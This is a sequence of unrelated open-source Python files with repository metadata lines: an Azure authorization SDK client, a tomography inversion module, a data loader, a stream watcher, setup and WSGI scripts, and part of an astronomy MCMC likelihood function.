self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_for_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.PermissionGetResult"]:
"""Gets all permissions the caller has for a resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PermissionGetResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.authorization.v2018_01_01_preview.models.PermissionGetResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PermissionGetResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_for_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PermissionGetResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_for_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Authorization/permissions'} # type: ignore
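    # Hypothetical usage sketch (assumes an aio AuthorizationManagementClient
    # exposing this operation group as `client.permissions`):
    #
    #   async for permission in client.permissions.list_for_resource_group("my-rg"):
    #       print(permission.actions)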
def list_for_resource(
self,
resource_group_name: str,
resource_provider_namespace: str,
parent_resource_path: str,
resource_type: str,
resource_name: str,
**kwargs: Any
) -> AsyncIterable["_models.PermissionGetResult"]:
"""Gets all permissions the caller has for a resource.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type of the resource.
:type resource_type: str
:param resource_name: The name of the resource to get the permissions for.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PermissionGetResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.authorization.v2018_01_01_preview.models.PermissionGetResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PermissionGetResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_for_resource.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str', skip_quote=True),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PermissionGetResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_for_resource.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}/providers/Microsoft.Authorization/permissions'} # type: ignore
| Azure/azure-sdk-for-python | sdk/authorization/azure-mgmt-authorization/azure/mgmt/authorization/v2018_01_01_preview/aio/operations/_permissions_operations.py | Python | mit | 10,365 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from numpy import array, zeros, linspace, meshgrid, ndarray, diag
from numpy import uint8, float64, int8, int0, float128, complex128
from numpy import exp, sqrt, cos, tan, arctan
from numpy import minimum, maximum
from numpy import ceil, floor
from numpy import matrix as npmatrix
from numpy.fft import fft, ifft
from numpy import pi
from scipy.linalg import solve_triangular as solve
from scipy.signal import fftconvolve as conv
from scipy.ndimage import geometric_transform as transform
# We will make use of *reentrant* locks.
from threading import RLock as Lock
from threading import Condition, Thread
# This module is a modification of Python's queue module,
# which allows one to interrupt a queue.
import iqueue
# This is a module written to execute code in parallel.
# While python is limited by the Global Interpreter Lock,
# numerical operations on NumPy arrays are generally not
# limited by the GIL.
import parallel
# This module allows the conversion of SAGE symbolic expressions
# to RPN code through the symbolic_to_rpn function. RPNProgram is a subclass
# of list that comes equipped with a __call__ method that implements
# execution of the RPN code.
import rpncalc
def _E(m):
return int0(npmatrix(diag((1,) * int(m + 1), k=0)[:, :-1]))
def _X(m):
return int0(npmatrix(diag((1,) * int(m), k=-1)[:, :-1]))
def _Del(m):
return int0(npmatrix(diag(xrange(1, int(m)), k=1)[:-1]))
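# Hedged illustration (added comment, not in the original module): for small m
# these helpers produce simple shift/selection operators, e.g.
#   _E(2)   -> 3x2 matrix, the 3x3 identity with its last column dropped
#   _X(2)   -> 3x2 matrix with ones on the first subdiagonal
#   _Del(3) -> 2x3 matrix [[0, 1, 0], [0, 0, 2]], weighting by 1..m-1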
class _CD_RPN:
def __init__(self):
self.coeffs = [(npmatrix((-1,)), npmatrix((-1,)))]
self.rpn = [(rpncalc.RPNProgram([-1]), rpncalc.RPNProgram([-1]))]
# In case this class is utilized by multiple threads.
self.lock = Lock()
def getcoeffs(self, m):
# Returns coefficients for $c_{m}$ and $d_{m}$.
# If they already exist in cache, just return what is there.
with self.lock:
if len(self.coeffs) <= m:
# Need to generate coefficients for $c_{m}$ and $d_{m}$.
# Fetch the coefficients for $c_{m-1}$ and $d_{m-1}$.
C, D = self.getcoeffs(m - 1)
if m % 2: # $m$ is odd
C_new = _E(m) * D * _X((m + 1) / 2).transpose() \
- ((1 + m) * _E(m) + 3 * _X(m)
+ 2 * (_E(m) + _X(m)) * _X(m - 1) * _Del(m)) * C \
* _E((m + 1) / 2).transpose()
D_new = _X(m) * C - (m * _E(m) + 2 * _X(m)
+ 2 * (_E(m) + _X(m)) * _X(m - 1) * _Del(m)) * D
else: # $m$ is even
C_new = _E(m) * D * _X(m / 2).transpose() \
- ((1 + m) * _E(m) + 3 * _X(m)
+ 2 * (_E(m) + _X(m)) * _X(m - 1) * _Del(m)) * C
D_new = _X(m) * C - (m * _E(m) + 2 * _X(m)
+ 2 * (_E(m) + _X(m)) * _X(m - 1) * _Del(m)) * D \
* _E(m / 2).transpose()
self.coeffs.append((C_new, D_new))
return self.coeffs[m]
def __getitem__(self, m):
n2 = rpncalc.wild("n2")
v2 = rpncalc.wild("v2")
mul = rpncalc.rpn_funcs[u"⋅"]
add = rpncalc.rpn_funcs[u"+"]
# Returns RPN code for $c_j$ and $d_j$. Generate on the fly if needed.
with self.lock:
while len(self.rpn) <= m:
cm_rpn = []
dm_rpn = []
C, D = self.getcoeffs(len(self.rpn))
# Generate RPN code for $c_j$ and $d_j$.
for row in array(C[::-1]):
npoly_rpn = []
for coeff in row[::-1]:
if coeff:
if len(npoly_rpn):
npoly_rpn.extend([n2, mul])
npoly_rpn.extend([coeff, add])
else:
npoly_rpn.append(coeff)
elif len(npoly_rpn):
npoly_rpn.extend([n2, mul])
if len(cm_rpn):
cm_rpn.extend([v2, mul])
cm_rpn.extend(npoly_rpn)
cm_rpn.append(add)
else:
cm_rpn.extend(npoly_rpn)
for row in array(D[::-1]):
npoly_rpn = []
for coeff in row[::-1]:
if coeff:
if len(npoly_rpn):
npoly_rpn.extend([n2, mul])
npoly_rpn.extend([coeff, add])
else:
npoly_rpn.append(coeff)
elif len(npoly_rpn):
npoly_rpn.extend([n2, mul])
if len(dm_rpn):
dm_rpn.extend([v2, mul])
dm_rpn.extend(npoly_rpn)
dm_rpn.append(add)
else:
dm_rpn.extend(npoly_rpn)
self.rpn.append(
(rpncalc.RPNProgram(cm_rpn), rpncalc.RPNProgram(dm_rpn)))
return self.rpn[m]
class Sderiv:
def __init__(self, alpha):
self.alpha = alpha
def __call__(self, A, ds):
H, W = A.shape
psi = rpncalc.decode(u"« x 3 ^ 4 / +/- 3 x * 4 / + »")
        N = int(ceil(self.alpha / ds))  # cast to int: N is used as an array index below
X = linspace(-N * ds - ds, N * ds + ds, 2 * N + 3)
Psi = psi(x=X / self.alpha)
Psi[X > self.alpha] = psi(x=1)
Psi[X < -self.alpha] = psi(x=-1)
stencil = (Psi[:-2] + Psi[2:] - 2 * Psi[1:-1]) / ds
diff = conv([stencil], A)
return N, N, diff[:, 2 * N:-2 * N]
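# Hedged usage sketch (added comment, not in the original module): Sderiv is a
# smoothed radial-derivative operator; given a 2-D array A sampled with radial
# step ds it returns the number of columns clipped on each side together with
# the differentiated array, mirroring its use in PolarBrokenRayInversion below.
#   D = Sderiv(alpha=0.1)                # alpha value is illustrative only
#   clip_left, clip_right, dA = D(A, ds)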
class PolarBrokenRayInversion(parallel.BaseTaskClass):
_cd = _CD_RPN()
_u = rpncalc.decode(u"« q phi sin ⋅ arcsin »")
_v = rpncalc.decode(u"« q phi sin ⋅ +/- q 2 ^ phi sin 2 ^ ⋅ +/- 1 + √ ÷ »")
_w = rpncalc.decode(u"« i phi u - ⋅ exp »")
_tm = rpncalc.decode(u"« i dm ⋅ n ⋅ cm v ⋅ + dlnr m ^ ⋅ m 2 + ! ÷ »")
_cf = rpncalc.decode(u"« dr r ⋅ v 2 ^ ⋅ phi csc ⋅ s 2 ^ ÷ »")
_invlock = Lock()
def __init__(self, Qf, Phi, smin, smax, alpha, nmax=200):
# Parameters:
# $\mathbf{Qf}$ -- $\mathcal{Q}f$, sampled on an $r\theta$ grid.
        # $\mathbf{Phi}$ ($\phi$) -- Scattering angle.
        # $\mathbf{smin}$, $\mathbf{smax}$ -- $s_{\min}$ and $s_{\max}$, the radial
        # bounds over which $\mathcal{Q}f$ is sampled.
        # $\mathbf{alpha}$ -- Smoothing width passed to Sderiv, the numerical
        # implementation of $\frac{\partial}{\partial r}$.
# $\mathbf{nmax}$ -- $n_{\max}$, reconstructs $\tilde{f}\left(r,n\right)$
# for $\left|n\right| \le n_{\max}$. Defaults to $200$.
# This reconstruction will assume that $\mathcal{Q}f$ is real and exploit
# conjugate symmetry in the Fourier series.
# Initialize variables.
self.Qf = Qf
self.Phi = Phi
self.smin = smin
self.smax = smax
H, W = Qf.shape
self.thetamin = thetamin = -pi
self.thetamax = thetamax = pi*(1-2.0/H)
self.nmax = nmax
self.F = None
self.F_cartesian = None
self.lock = Lock()
self.status = Condition(self.lock)
self.jobsdone = 0
self.jobcount = nmax + 1
self.running = False
self.projectioncount = 0
self.projecting = False
self.dr = dr = ds = (smax - smin) / float(W - 1)
self.dtheta = dtheta = (thetamax - thetamin) / float(H)
# Compute $\widetilde{\mathcal{Q}f}$.
self.FQf = FQf = fft(Qf, axis=0)
# Perform differentiation of $\widetilde{\mathcal{Q}f}$.
D = Sderiv(alpha)
try:
clip_left, clip_right, self.DFQf = D(FQf, ds)
except:
clip_left, clip_right, self.DFQf = D(float64(FQf), ds)
# Initialize array that will store $\tilde{f}$.
self.Ff = zeros(self.DFQf.shape, dtype=complex128)
# Initialize $rs$ grid.
self.rmin = self.smin + clip_left * ds
self.rmax = self.smax - clip_right * ds
R = linspace(self.rmin, self.rmax, W - clip_left - clip_right)
self.R, self.S = meshgrid(R, R)
# Compute $q$, $u$, $v$, $w$, and $v^{2}r*\csc(\phi)*{\Delta}r/s^2$.
self.Q = self.S / self.R
args = dict(q=self.Q, r=self.R, s=self.S, phi=self.Phi, dr=dr)
args["u"] = self.U = self._u(**args)
args["v"] = self.V = self._v(**args)
self.W = self._w(**args)
self.Factor = self._cf(**args)
def A(self, n, eps=0.0000001, p=16):
# Compute matrix $\mathbf{A}_n$.
H, W = self.DFQf.shape
# Initialize the An matrix (as an array for now).
An = zeros(self.R.shape, dtype=complex128)
# First compute a partial sum for the upper triangular part.
# Start with $m=0$
mask = self.S < self.R
Sum = zeros(self.R.shape, dtype=complex128)
for m in xrange(0, p + 1, 2):
cm_rpn, dm_rpn = self._cd[m]
Term = self._tm(v=self.V[mask], v2=self.V[mask] ** 2,
dlnr=self.dr / self.R[mask],
n=n, n2=n ** 2, m=m, cm=cm_rpn, dm=dm_rpn)
Sum[mask] += Term
mask[mask] *= abs(Term) >= eps
if not mask.any():
break
mask = self.S < self.R
An[mask] = 2 * self.W[mask] ** n * self.Factor[mask] * Sum[mask]
# Now to do the diagonal.
# Since $r=s$ here, we have $q=1$, $u=\phi$, $v=-\tan\phi$,
# and $w=1$.
mask = self.S == self.R
Sum = zeros(self.R.shape, dtype=complex128)
for m in xrange(0, p + 1):
cm_rpn, dm_rpn = self._cd[m]
Term = self._tm(v=-tan(self.Phi), v2=tan(self.Phi) ** 2,
dlnr=self.dr / self.R[mask],
n=n, n2=n ** 2, m=m, cm=cm_rpn, dm=dm_rpn)
Sum[mask] += Term
mask[mask] *= abs(Term) >= eps
if not mask.any():
break
mask = self.S == self.R
An[mask] = self.Factor[mask] * Sum[mask] + \
array([1 - 1 / cos(self.Phi)] * W)
return npmatrix(An)
def f(self, n):
# This is the function that is run in parallel.
An = self.A(n, eps=10 ** -9, p=24)
DFQf = self.DFQf[n]
#AnInv = inv(An).transpose()
#Ff = array(DFQf*AnInv)[0]
Ff = solve(An, DFQf)
return Ff
def populatequeue(self, queue):
for n in xrange(self.nmax + 1):
queue.put(n)
def postproc(self, (n, Ff)):
with self.status:
self.Ff[n] = Ff
if n > 0:
self.Ff[-n] = Ff.conjugate()
self.jobsdone += 1
self.status.notifyAll()
def reconstruct(self):
with self.lock:
self.F = ifft(self.Ff, axis=0)
return self.F
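    # Hedged usage sketch (added comment, not in the original module): the class
    # is normally driven through the `parallel` task machinery (populatequeue /
    # postproc), but a single Fourier mode can be solved directly; names and
    # values below are illustrative only.
    #   inv = PolarBrokenRayInversion(Qf, Phi=0.3, smin=1.0, smax=6.0, alpha=0.05)
    #   Ff_0 = inv.f(0)            # solve the n = 0 Fourier mode
    #   F = inv.reconstruct()      # inverse FFT over the filled modes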
| shersonb/brokenray | brokenray/polar.py | Python | mit | 11,050 |
import numpy
arr = numpy.array(list(map(float, input().split())))
x = float(input())
value = numpy.polyval(arr, x)
print(value)
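# Hedged illustration (added comment, not part of the original solution):
# numpy.polyval evaluates the polynomial with coefficients given highest degree
# first, e.g. numpy.polyval([1.1, 2, 3], 0) == 1.1*0**2 + 2*0 + 3 == 3.0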
| avtomato/HackerRank | Python/_16_Numpy/_14_Polynomials/solution.py | Python | mit | 130 |
"""
WSGI config for photoboard project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "photoboard.settings")
application = get_wsgi_application()
| photoboard/photoboard-django | photoboard/wsgi.py | Python | mit | 398 |
import torch
import torchvision.transforms as transforms
import torch.utils.data as data
import os
import json
import pickle
import argparse
from PIL import Image
import numpy as np
from utils import Vocabulary
class CocoDataset(data.Dataset):
def __init__(self, root, anns, vocab, mode='train',transform=None):
self.root = root
self.anns = json.load(open(anns))
self.vocab = pickle.load(open(vocab, 'rb'))
self.transform = transform
self.data = [ann for ann in self.anns if ann['split'] == mode]
def __getitem__(self, index):
data = self.data
vocab = self.vocab
# load image
path = os.path.join(self.root, data[index]['file_path'])
img = Image.open(path).convert('RGB')
if self.transform is not None:
img = self.transform(img)
# load caption
cap = data[index]['final_caption']
caption = []
caption.append(vocab('<start>'))
caption.extend([vocab(word) for word in cap])
caption.append(vocab('<end>'))
target = torch.IntTensor(caption)
return img, target, data[index]['imgid']
def __len__(self):
return len(self.data)
def collate_fn(data):
# sort the data in descending order
data.sort(key=lambda x: len(x[1]), reverse=True)
images, captions, imgids = zip(*data)
# merge images (from tuple of 3D tensor to 4D tensor).
images = torch.stack(images, 0)
# merge captions (from tuple of 1D tensor to 2D tensor).
lengths = [len(cap) for cap in captions]
targets = torch.zeros(len(captions), max(lengths)).long()
for i, cap in enumerate(captions):
end = lengths[i]
targets[i, :end] = cap[:end]
return images, targets, lengths, imgids
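# Hedged illustration (not part of the original module) of the padding performed
# by collate_fn above; the token ids below are made up for demonstration.
def _collate_padding_demo():
    caps = [torch.IntTensor([1, 5, 7, 2]), torch.IntTensor([1, 9, 2])]
    lengths = [len(c) for c in caps]
    # zero-pad every caption to the longest length in the batch
    padded = torch.zeros(len(caps), max(lengths)).long()
    for i, c in enumerate(caps):
        padded[i, :lengths[i]] = c
    # padded -> tensor([[1, 5, 7, 2], [1, 9, 2, 0]])
    return padded, lengths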
def get_loader(opt, mode='train', shuffle=True, num_workers=1, transform=None):
coco = CocoDataset(root=opt.root_dir,
anns=opt.data_json,
vocab=opt.vocab_path,
mode=mode,
transform=transform)
data_loader = torch.utils.data.DataLoader(dataset=coco,
batch_size=opt.batch_size,
shuffle=shuffle,
num_workers=num_workers,
collate_fn=collate_fn)
return data_loader
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--root_dir', type=str, default='/home/myunggi/Research/show-and-tell', help="root directory of the project")
parser.add_argument('--data_json', type=str, default='data/data.json', help='input data list which includes captions and image information')
parser.add_argument('--vocab_path', type=str, default='data/vocab.pkl', help='vocabulary wrapper')
parser.add_argument('--crop_size', type=int, default=224, help='image crop size')
parser.add_argument('--batch_size', type=int, default=128, help='batch size')
args = parser.parse_args()
transform = transforms.Compose([
transforms.RandomCrop(args.crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
data_loader = get_loader(args, transform=transform)
total_iter = len(data_loader)
    for i, (img, target, length, imgid) in enumerate(data_loader):
print('done')
| incredible-vision/show-and-tell | data_loader.py | Python | mit | 3,497 |
from collections import namedtuple
import select
StreamEvent = namedtuple( 'StreamEvent', [ 'fd', 'stream', 'data', 'direction', 'num_bytes', 'eof' ] )
class StreamWatcher(object):
def __init__( self ):
if _best_backend is None:
raise Exception( "No poll/queue backend could be found for your OS." )
self.backend = _best_backend( )
self.fd_map = {}
self.stream_map = {}
def watch( self, fd, data=None, read=True, write=False ):
# allow python file-like objects that have a backing fd
if hasattr(fd, 'fileno') and callable(fd.fileno):
stream = fd
fd = stream.fileno()
self.stream_map[fd] = stream
else:
self.stream_map[fd] = None
# associate user data with the fd
self.fd_map[fd] = data
# prepare any event filter additions
if read:
self.backend.watch_read( fd )
if write:
self.backend.watch_write( fd )
def wait( self, timeout=None, max_events=4 ):
return self.backend.wait(
timeout=timeout,
max_events=max_events,
fd_data_map=self.fd_map,
fd_stream_map=self.stream_map )
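    # Hedged usage sketch (added comment, not in the original module): watch the
    # read end of a pipe and wait for readability events; names and values are
    # illustrative only and require one of the backends defined below.
    #   import os
    #   watcher = StreamWatcher()
    #   r_fd, w_fd = os.pipe()
    #   watcher.watch(r_fd, data='demo-pipe', read=True)
    #   os.write(w_fd, b'hello')
    #   for event in watcher.wait(timeout=1.0):
    #       print(event.fd, event.direction, event.num_bytes, event.eof)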
_best_backend = None
try:
from select import kqueue, kevent
except ImportError:
pass
else:
class KQueueBackend(object):
def __init__( self ):
self.kq = kqueue( )
def watch_read( self, fd ):
event = kevent( fd, filter=select.KQ_FILTER_READ, flags=select.KQ_EV_ADD )
self._add_events( [event] )
def watch_write( self, fd ):
event = kevent( fd, filter=select.KQ_FILTER_WRITE, flags=select.KQ_EV_ADD )
self._add_events( [event] )
def _add_events( self, new_events ):
e = self.kq.control( new_events, 0, 0 )
assert len(e) == 0, "Not expecting to receive any events while adding filters."
def wait( self, timeout=None, max_events=4, fd_data_map={}, fd_stream_map={} ):
r_events = self.kq.control( None, max_events, timeout )
e = []
for event in r_events:
fd = event.ident
if fd in fd_data_map:
stream = fd_stream_map.get( fd, None )
data = fd_data_map.get( fd, None )
direction = 'read' if event.filter == select.KQ_FILTER_READ else 'write'
num_bytes = event.data
eof = ( event.flags & select.KQ_EV_EOF != 0 )
e.append( StreamEvent( fd, stream, data, direction, num_bytes, eof ) )
return e
if _best_backend is None:
_best_backend = KQueueBackend
try:
from select import epoll
from fcntl import ioctl
import array
import termios
except ImportError:
pass
else:
class EPollBackend(object):
def __init__( self ):
self.ep = epoll( )
def watch_read( self, fd ):
self.ep.register( fd, select.EPOLLIN )
def watch_write( self, fd ):
self.ep.register( fd, select.EPOLLOUT )
def wait( self, timeout=None, max_events=None, fd_data_map={}, fd_stream_map={} ):
if max_events is None:
max_events = -1
if timeout is None:
timeout = -1
r_events = self.ep.poll( timeout, max_events )
e = []
for fd, event in r_events:
if fd in fd_data_map:
buf = array.array( 'i', [0] )
ioctl( fd, termios.FIONREAD, buf, 1 )
stream = fd_stream_map.get( fd, None )
data = fd_data_map.get( fd, None )
num_bytes = buf[0]
eof = ( event & (select.EPOLLHUP | select.EPOLLERR) != 0 )
if event & select.EPOLLIN != 0:
e.append( StreamEvent( fd, stream, data, 'read', num_bytes, eof ) )
if event & select.EPOLLOUT != 0:
e.append( StreamEvent( fd, stream, data, 'write', num_bytes, eof ) )
return e
if _best_backend is None:
_best_backend = EPollBackend
| theojulienne/pyio | pyio/io/StreamWatcher.py | Python | mit | 3,517 |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description':'End to end solution for bitcoin data gathering, backtesting, and live trading',
'author': 'ross palmer',
'url':'http://rosspalmer.github.io/bitQuant/',
'license':'MIT',
'version': '0.2.10',
'install_requires': ['SQLAlchemy','pandas','numpy','scipy','PyMySQL'],
'packages': ['bitquant'],
'scripts': [],
'name':'bitquant'
}
setup(**config)
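# Hedged usage note (added comment, not part of the original file): with this
# script the package would typically be installed from the project root with
# `pip install .`, which also pulls in the dependencies listed in
# install_requires above.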
| multidis/bitQuant02 | setup.py | Python | mit | 464 |
#! /usr/bin/env python
"""
Module with the MCMC (``emcee``) sampling for NEGFC parameter estimation.
"""
__author__ = 'O. Wertz, Carlos Alberto Gomez Gonzalez, V. Christiaens'
__all__ = ['mcmc_negfc_sampling',
'chain_zero_truncated',
'show_corner_plot',
'show_walk_plot',
'confidence']
import numpy as np
import os
import emcee
from multiprocessing import cpu_count
import inspect
import datetime
import corner
from matplotlib import pyplot as plt
from matplotlib.ticker import MaxNLocator
import pickle
from scipy.stats import norm
from ..fm import cube_inject_companions
from ..config import time_ini, timing
from ..config.utils_conf import sep
from ..psfsub import pca_annulus
from .negfc_fmerit import get_values_optimize, get_mu_and_sigma
from .utils_mcmc import gelman_rubin, autocorr_test
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
from ..fits import write_fits
def lnprior(param, bounds):
""" Define the prior log-function.
Parameters
----------
param: tuple
The model parameters.
bounds: list
The bounds for each model parameter.
Ex: bounds = [(10,20),(0,360),(0,5000)]
Returns
-------
out: float.
0 if all the model parameters satisfy the prior conditions defined here.
-np.inf if at least one model parameters is out of bounds.
"""
try:
r, theta, flux = param
except TypeError:
print('param must be a tuple, {} given'.format(type(param)))
try:
r_bounds, theta_bounds, flux_bounds = bounds
except TypeError:
print('bounds must be a list of tuple, {} given'.format(type(bounds)))
if r_bounds[0] <= r <= r_bounds[1] and \
theta_bounds[0] <= theta <= theta_bounds[1] and \
flux_bounds[0] <= flux <= flux_bounds[1]:
return 0.0
else:
return -np.inf
def lnlike(param, cube, angs, plsc, psf_norm, fwhm, annulus_width, ncomp,
aperture_radius, initial_state, cube_ref=None, svd_mode='lapack',
scaling='temp-mean', algo=pca_annulus, delta_rot=1, fmerit='sum',
imlib='vip-fft', interpolation='lanczos4', collapse='median',
algo_options={}, weights=None, transmission=None, mu_sigma=True,
sigma='spe+pho', debug=False):
""" Define the likelihood log-function.
Parameters
----------
param: tuple
The model parameters, typically (r, theta, flux).
cube: numpy.array
The cube of fits images expressed as a numpy.array.
angs: numpy.array
The parallactic angle fits image expressed as a numpy.array.
plsc: float
The platescale, in arcsec per pixel.
psf_norm: numpy.array
The scaled psf expressed as a numpy.array.
annulus_width: float
The width of the annulus of interest in pixels.
ncomp: int or None
The number of principal components for PCA-based algorithms.
fwhm : float
The FHWM in pixels.
aperture_radius: float
The radius of the circular aperture in terms of the FWHM.
initial_state: numpy.array
The initial guess for the position and the flux of the planet.
cube_ref: numpy ndarray, 3d, optional
Reference library cube. For Reference Star Differential Imaging.
svd_mode : {'lapack', 'randsvd', 'eigen', 'arpack'}, str optional
Switch for different ways of computing the SVD and selected PCs.
scaling : {'temp-mean', 'temp-standard'} or None, optional
With None, no scaling is performed on the input data before SVD. With
"temp-mean" then temporal px-wise mean subtraction is done and with
"temp-standard" temporal mean centering plus scaling to unit variance
is done.
algo: vip function, optional {pca_annulus, pca_annular}
Post-processing algorithm used.
delta_rot: float, optional
If algo is set to pca_annular, delta_rot is the angular threshold used
to select frames in the PCA library (see description of pca_annular).
fmerit : {'sum', 'stddev'}, string optional
Chooses the figure of merit to be used. stddev works better for close in
companions sitting on top of speckle noise.
imlib : str, optional
See the documentation of the ``vip_hci.preproc.frame_shift`` function.
interpolation : str, optional
See the documentation of the ``vip_hci.preproc.frame_shift`` function.
collapse : {'median', 'mean', 'sum', 'trimmean', None}, str or None, optional
Sets the way of collapsing the frames for producing a final image. If
None then the cube of residuals is used when measuring the function of
merit (instead of a single final frame).
algo_options: dict, opt
Dictionary with additional parameters related to the algorithm
(e.g. tol, min_frames_lib, max_frames_lib). If 'algo' is not a vip
routine, this dict should contain all necessary arguments apart from
the cube and derotation angles. Note: arguments such as ncomp, svd_mode,
scaling, imlib, interpolation or collapse can also be included in this
dict (the latter are also kept as function arguments for consistency
with older versions of vip).
weights : 1d array, optional
If provided, the negative fake companion fluxes will be scaled according
to these weights before injection in the cube. Can reflect changes in
the observing conditions throughout the sequence.
transmission: numpy array, optional
Radial transmission of the coronagraph, if any. Array with 2 columns.
First column is the radial separation in pixels. Second column is the
off-axis transmission (between 0 and 1) at the radial separation given
in column 1.
mu_sigma: tuple of 2 floats or None, opt
If set to None: not used, and falls back to original version of the
algorithm, using fmerit. Otherwise, should be a tuple of 2 elements,
containing the mean and standard deviation of pixel intensities in an
annulus centered on the location of the companion, excluding the area
directly adjacent to the companion.
sigma: str, opt
Sets the type of noise to be included as sigma^2 in the log-probability
expression. Choice between 'pho' for photon (Poisson) noise, 'spe' for
residual (mostly whitened) speckle noise, or 'spe+pho' for both.
debug: boolean
If True, the cube is returned along with the likelihood log-function.
Returns
-------
out: float
The log of the likelihood.
"""
## set imlib for rotation and shift
if imlib == 'opencv':
imlib_rot = imlib
imlib_sh = imlib
elif imlib == 'skimage' or imlib == 'ndimage-interp':
imlib_rot = 'skimage'
imlib_sh = 'ndimage-interp'
elif imlib == 'vip-fft' or imlib == 'ndimage-fourier':
imlib_rot = 'vip-fft'
imlib_sh = 'ndimage-fourier'
else:
raise TypeError("Interpolation not recognized.")
# Create the cube with the negative fake companion injected
if weights is None:
flux = -param[2]
norm_weights=weights
else:
flux = -param[2]*weights
norm_weights = weights/np.sum(weights)
cube_negfc = cube_inject_companions(cube, psf_norm, angs, flevel=flux,
plsc=plsc, rad_dists=[param[0]],
n_branches=1, theta=param[1],
imlib=imlib_sh,
interpolation=interpolation,
transmission=transmission,
verbose=False)
# Perform PCA and extract the zone of interest
values = get_values_optimize(cube_negfc, angs, ncomp, annulus_width,
aperture_radius, fwhm, initial_state[0],
initial_state[1], cube_ref=cube_ref,
svd_mode=svd_mode, scaling=scaling,
algo=algo, delta_rot=delta_rot, imlib=imlib_rot,
interpolation=interpolation, collapse=collapse,
algo_options=algo_options,
weights=norm_weights)
